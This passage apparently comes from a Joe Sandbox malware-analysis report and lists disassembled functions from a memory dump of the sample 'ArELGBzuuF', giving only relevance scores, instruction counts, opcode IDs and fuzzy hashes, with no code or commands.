                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID: 8xH
                    • API String ID: 0-4181425785
                    • Opcode ID: ad8a6a17cdde844dc90aba0408afed80148fb82726581e11331f4a8e2055ce37
                    • Instruction ID: 49e79b9a00e7c9033713b420597afecf1d46fe6acc65243ea04cc5f76bea8ada
                    • Opcode Fuzzy Hash: ad8a6a17cdde844dc90aba0408afed80148fb82726581e11331f4a8e2055ce37
                    • Instruction Fuzzy Hash: 68E01A31D1892E8EDB44FB58D8555FCB3A1FB94340F000429D40DD3182DB246C14D784
                    Function 00007FF848F1E350 Relevance: .7, Instructions: 690COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2e8464b91b0fc851c795779807cb306d09a27952b5c5f19d8183c5e048780d74
                    • Instruction ID: 0c08f3ebc1f6f8c031a23d6cab728cb21e205eab7625077ebe04cd3a818edbe4
                    • Opcode Fuzzy Hash: 2e8464b91b0fc851c795779807cb306d09a27952b5c5f19d8183c5e048780d74
                    • Instruction Fuzzy Hash: 86328130E1CA198FEB98EB18C895AA977E2FF58351F5441B9D00EC72D2DF24AC45CB85
                    Function 00007FF848F17AE5 Relevance: .4, Instructions: 440COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ba3bcae5b0619b24ad1ede21279b160dd5cc8efc14b0212971ac6ba881d162b1
                    • Instruction ID: 7218ed2fc90992777a917f8ab1d74f9af8f443ef4c0417f6dfbd288acc60d34a
                    • Opcode Fuzzy Hash: ba3bcae5b0619b24ad1ede21279b160dd5cc8efc14b0212971ac6ba881d162b1
                    • Instruction Fuzzy Hash: BBD1EE30E1DA4A9FEB85EBA888566F9BBF0FF44380F54007AD049D36C6DE286C41C795
                    Function 00007FF848F2BF02 Relevance: .4, Instructions: 431COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3f4615dbfe0159ec99b45a22dfe9010fea07316bee9b3281b233a634b2b47f4f
                    • Instruction ID: 77879af800c87ec6466d08725e9c8a5ba1f34821502afeb545dac6d3bb7226cd
                    • Opcode Fuzzy Hash: 3f4615dbfe0159ec99b45a22dfe9010fea07316bee9b3281b233a634b2b47f4f
                    • Instruction Fuzzy Hash: 73D16D31A4CD089FDF99EF28D499E6573E1FB79700B1445A9D40AC72E2DE28EC85CB81
                    Function 00007FF848F1B4B1 Relevance: .4, Instructions: 426COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7d416bfc2b6c36c6c6d6e3ed6304fcee9ffa593d2e482dbf7440b7c9c81e401f
                    • Instruction ID: b041f34261dbaa43a4e9c2cb55af8936eba2a5785c0b4d4a1a128abddafbcf67
                    • Opcode Fuzzy Hash: 7d416bfc2b6c36c6c6d6e3ed6304fcee9ffa593d2e482dbf7440b7c9c81e401f
                    • Instruction Fuzzy Hash: 98F10430919A5D8FDB99EF28C895BA9B7B1FF59300F1440E9D00EE7292CB35AD85CB44
                    Function 00007FF848F2062F Relevance: .4, Instructions: 422COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 105d4cfdafa71a727434896c1975ab7912e16172f493bcfd3b1435c64a25cdc1
                    • Instruction ID: fe9470767d5235690437255c5ae04ed84df6a0c719a30d2d2121b33581f6b6af
                    • Opcode Fuzzy Hash: 105d4cfdafa71a727434896c1975ab7912e16172f493bcfd3b1435c64a25cdc1
                    • Instruction Fuzzy Hash: 0CF1CE3191C6568FEB48EF18D0E06B57BA1FF85340F5441BDC84ACB68ACB39E881CB85
                    Function 00007FF848F117B0 Relevance: .3, Instructions: 348COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 02168f5025e3d60e11b675cf499ff2da42b5369e588e1ff07efdac3a255d2d4b
                    • Instruction ID: 648e4fcb785d70711c7d76aec02048ca06475746f2f270d6373e84731e693792
                    • Opcode Fuzzy Hash: 02168f5025e3d60e11b675cf499ff2da42b5369e588e1ff07efdac3a255d2d4b
                    • Instruction Fuzzy Hash: A8D14971D1965A9FEB98EB68C4A57B8B7B1FF59340F1440B9D00EE3292CB386884CB14
                    Function 00007FF848F2064F Relevance: .3, Instructions: 337COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 12d1e12b6361b0215ec8161eb069413518790e5dabfbc4d25af9ade13bf980a9
                    • Instruction ID: e27b501345e7812ab65111be42a7ae195fb797624ede99dc30fc91db1f0a58b7
                    • Opcode Fuzzy Hash: 12d1e12b6361b0215ec8161eb069413518790e5dabfbc4d25af9ade13bf980a9
                    • Instruction Fuzzy Hash: 59C1AD3151C6568FEB09EF18D0E06B577A1FF85350B5445BDC88B8B6CACB39E881CB89
                    Function 00007FF848F2D12F Relevance: .3, Instructions: 313COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 977bcbdfbfae119d39821d023e86d9956dff0637b87d60ec06e2945d9eed30f8
                    • Instruction ID: 32c695ee56c4c04267d326ccec97c4519694e2dc34a3d157fda76dd0c3cf0972
                    • Opcode Fuzzy Hash: 977bcbdfbfae119d39821d023e86d9956dff0637b87d60ec06e2945d9eed30f8
                    • Instruction Fuzzy Hash: D9A1503164CD099FDB89FB58D498EA577E1FF79301B1541A9D00AC76E2CE29EC80CB81
                    Function 00007FF848F1FF4E Relevance: .3, Instructions: 294COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c3d7c38ff524c86821121f9fb48b2a1965493e27da6d0088166efa14a411b8c6
                    • Instruction ID: 58b8069630eecd6500cb850e2acc8329bfe30a0aea5e692919d1444c810b9752
                    • Opcode Fuzzy Hash: c3d7c38ff524c86821121f9fb48b2a1965493e27da6d0088166efa14a411b8c6
                    • Instruction Fuzzy Hash: EFA1E431A0CA469FE749FB28D0906B4BBA1FF55350F5441BAC84EC7AC7CB28B851CB95
                    Function 00007FF848F17E55 Relevance: .3, Instructions: 285COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a918b3c34ae693dd2d5c40ed7290a038cfa97e0a3e148ef291c3fbc8bccd495
                    • Instruction ID: 6d8f5cdbdfb1c78af641512ac2ed7c6fabc01fdc6f83cfaf451d1b9b456f838b
                    • Opcode Fuzzy Hash: 1a918b3c34ae693dd2d5c40ed7290a038cfa97e0a3e148ef291c3fbc8bccd495
                    • Instruction Fuzzy Hash: 3C91D431E1CA8E8FEB89EB2898556A97BE2FF99740F4401BAD04DD32C6CF285D01C755
                    Function 00007FF848F19E38 Relevance: .3, Instructions: 281COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 48c6afe214687ffe5b47900108ecd55fbd3a2c324102ce9e61941fe6b33e11c0
                    • Instruction ID: 9fd0a269f314403776ed96293fa5e20253c5cf29e71f5ece50b1609d38be684f
                    • Opcode Fuzzy Hash: 48c6afe214687ffe5b47900108ecd55fbd3a2c324102ce9e61941fe6b33e11c0
                    • Instruction Fuzzy Hash: 24917F30E19A4A9FEB84EBA8D856ABDBBB1FF58740F500079D009E36C6DF286C41C755
                    Function 00007FF848F17CC8 Relevance: .3, Instructions: 271COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 70d62f832a9613370018ff59991c571983053c5f317c01da1bf50e901dfbaf21
                    • Instruction ID: dbf403e3e80b1a188c077c670c0d2b0c7382db784a3de1ca3987153488a2e5ea
                    • Opcode Fuzzy Hash: 70d62f832a9613370018ff59991c571983053c5f317c01da1bf50e901dfbaf21
                    • Instruction Fuzzy Hash: 2871A531B1DA064FE659BB18D4415B5B3E1FF98360B64027ED04EC369ADF29FC428784
                    Function 00007FF848F1F416 Relevance: .3, Instructions: 264COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d9a6553f94378733151c6fa30e1dbf4b2cd12ce1ec7a3dbdb51059ef703d8396
                    • Instruction ID: 1e5ac64c8bd306422c8c3f72e1cd3f051dacb43575b09c2696ed16d2dc5035bc
                    • Opcode Fuzzy Hash: d9a6553f94378733151c6fa30e1dbf4b2cd12ce1ec7a3dbdb51059ef703d8396
                    • Instruction Fuzzy Hash: 7081123190D6468FE728AF2894951757BE0EF95390F24057EE88FC32D3EF29AC428759
                    Function 00007FF848F11831 Relevance: .2, Instructions: 246COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 23002fe2670801c7aefb4c4d09d799a2f20ab24b3838405f389f74cb027ec979
                    • Instruction ID: 6fa0c3237c7bc597967277abb76659e00419ef1cf79fd2866a92e138ce022a84
                    • Opcode Fuzzy Hash: 23002fe2670801c7aefb4c4d09d799a2f20ab24b3838405f389f74cb027ec979
                    • Instruction Fuzzy Hash: EB913C71D1995A9FEB98EB68C4A57B8B7B1FF55340F1440B9C00DE7292CF386884CB15
                    Function 00007FF848F2564D Relevance: .2, Instructions: 244COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c54c3443632fb96d861e16f39b329f7338fc323b0163a5eddf0f83bc15c1aaf4
                    • Instruction ID: 5d26009e7503723b4abc48c0b14688266753036bb5e6f0bd7333ac4d2db78c52
                    • Opcode Fuzzy Hash: c54c3443632fb96d861e16f39b329f7338fc323b0163a5eddf0f83bc15c1aaf4
                    • Instruction Fuzzy Hash: 73810670909A5D8FDB94EF68D895BACBBB1FF59341F1001AAD00DE3291CB79A881CB40
                    Function 00007FF848F14345 Relevance: .2, Instructions: 236COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 84ac516a6c2ebb105b3ef69cc8bf12fa1feefa8af32d08962e17af2ae5495391
                    • Instruction ID: de6f64e2b2d96699ceb33a66da9ef69fa34e390e5d777cb967ef2c93406953f6
                    • Opcode Fuzzy Hash: 84ac516a6c2ebb105b3ef69cc8bf12fa1feefa8af32d08962e17af2ae5495391
                    • Instruction Fuzzy Hash: 92815972C1E6C25FE355AF2868551B97FA2FFA2794F1800BBD488871C7DF186C098399
                    Function 00007FF848F16F85 Relevance: .2, Instructions: 236COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d8bc7bc35bb10fef1f0a8891d9834f32482c9c077c9e14b2559969b36f151f17
                    • Instruction ID: 1c1300e769f8a5cf7893a0e527cf7837ae587063d159c5fff20f7266164d55ce
                    • Opcode Fuzzy Hash: d8bc7bc35bb10fef1f0a8891d9834f32482c9c077c9e14b2559969b36f151f17
                    • Instruction Fuzzy Hash: 47810331C1DA5A9FE795EB2888697B9BBE1FF54780F1400BAC00C871C6DF29AC45CB55
                    Function 00007FF848F1E13B Relevance: .2, Instructions: 232COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eceebaf4ae5794ea3e6da52990d073de71974dd4500bb75dc950a5db517b8240
                    • Instruction ID: c64e420eb7abd0f516f8532077d21c65e402c34204c819fc35303ffe08b7cdb2
                    • Opcode Fuzzy Hash: eceebaf4ae5794ea3e6da52990d073de71974dd4500bb75dc950a5db517b8240
                    • Instruction Fuzzy Hash: 51719A30D1DA4A8EEBA9EB6888546BCBBB1FF49380F1405BAD00ED71C2DF286C458715
                    Function 00007FF848F21671 Relevance: .2, Instructions: 222COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 83a31e1fa1031506a1c749024894b12d63aac7ede5945fdb33e2b05c745a5355
                    • Instruction ID: 449926837f16e8aa1979d947649adf9142a42243c2731160d15cdd031db93034
                    • Opcode Fuzzy Hash: 83a31e1fa1031506a1c749024894b12d63aac7ede5945fdb33e2b05c745a5355
                    • Instruction Fuzzy Hash: 6981B03090DB468FE369EB54E1945B177E1FF44340F64497EC48A87AD2DB2AB882CB49
                    Function 00007FF848F224FA Relevance: .2, Instructions: 217COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 05f5239f294a80b6ea6aea4c1e0e9c0692e828ddd856c9954685421abeec50df
                    • Instruction ID: cb6c28dd09b4095fa6d7dc11ea2c9e2925a1af625737b9b1d3eae93ccddef23b
                    • Opcode Fuzzy Hash: 05f5239f294a80b6ea6aea4c1e0e9c0692e828ddd856c9954685421abeec50df
                    • Instruction Fuzzy Hash: D981A170E1992D8FDB98EB58D895BA8B7B1FB68341F5041AAD00DE3291DB396D81CB40
                    Function 00007FF848F10DD9 Relevance: .2, Instructions: 216COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 31539506d5b4346150bde226f5aebd38918d2d401800f39df8caa5db639ff846
                    • Instruction ID: 3916f52068722bc287b984db52cab4472f03be03b4c59b27cf8a8b5e959ee497
                    • Opcode Fuzzy Hash: 31539506d5b4346150bde226f5aebd38918d2d401800f39df8caa5db639ff846
                    • Instruction Fuzzy Hash: BA714930A1995E8FDB84FF58C895AEAB7F1FF98340F1445A5D409D7296CE38A881CB90
                    Function 00007FF848F26067 Relevance: .2, Instructions: 214COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 50aac56963758fec630f21df23c14c39392fec7016072a194bb6c137f2495958
                    • Instruction ID: 7c87b21789f52481d46c3ba85a162daacd7da9c0ac38ab790f8adcc0cf9b0a2c
                    • Opcode Fuzzy Hash: 50aac56963758fec630f21df23c14c39392fec7016072a194bb6c137f2495958
                    • Instruction Fuzzy Hash: D8511F30B5C8098FEE88FB289494A7933D2EFA9784B544479E40EC72E7DE2DEC418701
                    Function 00007FF848F108B1 Relevance: .2, Instructions: 210COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf1ee4eaddde99f77cb63e24b79f62d3888b47587f7dc21534fea4c8e0eaec0e
                    • Instruction ID: 63f4d19e295e950ee0a2d20fc7cb1871e76f17f51e57bf8962842065529bc912
                    • Opcode Fuzzy Hash: bf1ee4eaddde99f77cb63e24b79f62d3888b47587f7dc21534fea4c8e0eaec0e
                    • Instruction Fuzzy Hash: 8B618E3190CA6E8FEB98FF68C8986A9B7A1FF98341F54017AD409D72D1DF35A841CB44
                    Function 00007FF848F14843 Relevance: .2, Instructions: 207COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b8631e4aad98e3a1102cbe7ae1e332d066988359bea0b9117d0bad683c1f23e6
                    • Instruction ID: 233665ecb0246c4911b768af3d3b9edd9fe865bcdc82c55bdbd8577610fea34c
                    • Opcode Fuzzy Hash: b8631e4aad98e3a1102cbe7ae1e332d066988359bea0b9117d0bad683c1f23e6
                    • Instruction Fuzzy Hash: B281C470D19A1D8FEB94EFA8C855BADB7B1FF58340F1041AAD00DE3296DF3869818B44
                    Function 00007FF848F2D137 Relevance: .2, Instructions: 205COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c03976faf9fbbff0c8b63ad56c9063734442148906e61fb9d9570901127d48a2
                    • Instruction ID: e84084e7c4c0f89913cdba10d6d9ea950b90ece8f3db634123d2ce9ea22ad638
                    • Opcode Fuzzy Hash: c03976faf9fbbff0c8b63ad56c9063734442148906e61fb9d9570901127d48a2
                    • Instruction Fuzzy Hash: 68618431A0CD498FDB85FB28D4A8EA577F1FF69301B1541A9D04AC72E2DE28EC84CB41
                    Function 00007FF848F27AEC Relevance: .2, Instructions: 197COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 45ac21532f113d080e1987193169e6874f0ff6cac15169b9a8bb86eb5204b6f1
                    • Instruction ID: d3c0a5b002dbe51849770f184ca2a773dd02260fec99c4c494ed12e3e014b3e9
                    • Opcode Fuzzy Hash: 45ac21532f113d080e1987193169e6874f0ff6cac15169b9a8bb86eb5204b6f1
                    • Instruction Fuzzy Hash: 3C518170908A1C8FDB58EF68D845BE9BBF1FB59310F1082AAD44DD3252DF35A9858F81
                    Function 00007FF848F16FE5 Relevance: .2, Instructions: 194COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c431acfb46a81dee43b5ebb82f1710b6964620a573251dedffd99d25864e713
                    • Instruction ID: 2ae7a096551111550bb45dfe60bd9a8af40254dd720fe163f0a590dc1dd56177
                    • Opcode Fuzzy Hash: 4c431acfb46a81dee43b5ebb82f1710b6964620a573251dedffd99d25864e713
                    • Instruction Fuzzy Hash: 6551FE31D0DA5A9FEB95EB28C8657A9BBA2FF58740F1400B9C00CD72C6DF28AC45CB15
                    Function 00007FF848F25931 Relevance: .2, Instructions: 190COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: d102d20881091568de6f77f14d45f729b0edeeca4decf1b90e1d3f669ae63801
                    • Instruction ID: 5894b91b42d05bc5b839c184ef43e6b1612fbbdb274da230dd52aff49cfb4d4e
                    • Opcode Fuzzy Hash: d102d20881091568de6f77f14d45f729b0edeeca4decf1b90e1d3f669ae63801
                    • Instruction Fuzzy Hash: AA515170D0C95D8FDB85EB68E4556ECBBF1FF59350F0401AAD00DD7292CB296842CB55
                    Function 00007FF848F18C11 Relevance: .2, Instructions: 188COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1c06f3a0503777f4abc361670a88156951c516f420c02d2c3ff84e51899460ea
                    • Instruction ID: 8ea58eb324bd49bb23b5814cdeb2d7db1f88499588cc216edea71295bdb6b22c
                    • Opcode Fuzzy Hash: 1c06f3a0503777f4abc361670a88156951c516f420c02d2c3ff84e51899460ea
                    • Instruction Fuzzy Hash: A251C131A2EE8E4FEB99EB2895546B97BE1FF94350F4404BAD40DC72C6DF28AC048744
                    Function 00007FF848F19401 Relevance: .2, Instructions: 187COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 84adab224765639da176527150f1268b4f7562d1221669bbbaabd55207c0a3f7
                    • Instruction ID: e0358ce1e0a76cc06e661f8748df3e83213454a8ae67e778161030cf0de4ae62
                    • Opcode Fuzzy Hash: 84adab224765639da176527150f1268b4f7562d1221669bbbaabd55207c0a3f7
                    • Instruction Fuzzy Hash: EE51BF31A1CA098FDF89EF68D4959ACB7E1FF64354F40416AD009DB296DF34AC42CB84
                    Function 00007FF848F2C479 Relevance: .2, Instructions: 186COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a44c04393a4681caa6cafec8433e1f85eaf7851229ed74f2bcbaa308f6b8b38
                    • Instruction ID: 579c1fd5f8551f58bf72a467d3913dda1c85212d6b5756bb59b6f5109ac57b7a
                    • Opcode Fuzzy Hash: 9a44c04393a4681caa6cafec8433e1f85eaf7851229ed74f2bcbaa308f6b8b38
                    • Instruction Fuzzy Hash: 6B518230A18A4A8FDB85EF28D451AB577E1FF69380F5541B9E40EC72D6EF29EC418740
                    Function 00007FF848F19235 Relevance: .2, Instructions: 182COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2057197494.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff848f10000_ArELGBzuuF.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 829a1362f85c879bdff1d42e62c311e0657c355fb6f1ffbae6968f0a5ceceddc
                    • Instruction ID: cc56e6bd5d55f447246ff40bd167dd3fbef50a3702372f9a1ae5db3c15103f91
                    • Opcode Fuzzy Hash: 829a1362f85c879bdff1d42e62c311e0657c355fb6f1ffbae6968f0a5ceceddc
                    • Instruction Fuzzy Hash: 39510332F0EAC54FE396A73C6814175BBA1EF557A0B4801FBD088C75DBD518AC0983DA
                    Function 00007FF848F27D11 Relevance: .2, Instructions: 179COMMON
                    Download Yara Rule
                    Memory Dump Source
